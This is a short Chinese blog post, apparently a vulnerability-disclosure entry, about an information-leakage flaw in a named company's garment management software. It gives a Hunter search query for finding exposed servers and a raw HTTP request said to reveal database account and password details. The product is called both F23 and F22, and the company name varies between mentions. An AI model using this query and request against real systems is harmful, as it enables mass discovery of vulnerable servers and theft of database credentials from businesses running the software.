Babing
Published on 2024-08-30 / 2 Visits
0
0

G6-2广州锦泰软件科技有限公司-F23服装管理软件系统-InformationLeakage

G6-2广州锦泰软件科技有限公司-F23服装管理软件系统-InformationLeakage

漏洞描述:

广州锦铭泰软件科技有限公司,是一家专业为品牌服饰鞋包企业提供信息化解决方案的高科技企业,该公司开发的F22服装管理软件系统存在信息泄漏漏洞,攻击者最终可利用该漏洞获取数据库账号密码等连接信息。

网站图片:

image-1.webp

网络测绘:

Hunter 语法:

  • hunterweb.body=“(images/login_c05-05.gif)”

漏洞复现:

payload:

GET /pos/index_login.asp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

效果图:
image-1.webp


Comment